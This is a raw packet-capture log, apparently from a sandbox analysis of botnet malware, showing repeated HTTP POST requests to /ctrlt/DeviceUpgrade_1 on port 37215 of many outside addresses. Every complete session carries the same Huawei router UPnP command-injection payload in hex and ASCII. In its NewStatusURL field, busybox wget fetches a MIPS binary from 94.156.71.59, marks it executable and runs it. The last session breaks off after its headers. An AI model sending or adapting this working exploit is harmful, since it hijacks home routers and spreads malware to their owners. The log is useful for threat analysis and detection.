                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            121192.168.2.1356350156.211.89.22137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.973057985 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            122192.168.2.1360388197.149.113.5737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.973932981 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            123192.168.2.134474041.38.164.9337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.974792004 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            124192.168.2.1336530156.231.3.18537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.975667000 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            125192.168.2.1334932197.9.107.3437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.976496935 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            126192.168.2.136087841.140.184.24737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.977354050 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            127192.168.2.136025641.204.133.9337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.978245974 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            128192.168.2.1345156197.37.79.437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.979090929 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            129192.168.2.133536241.117.93.14237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.979939938 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            130192.168.2.1335420197.64.121.19437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.980839014 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
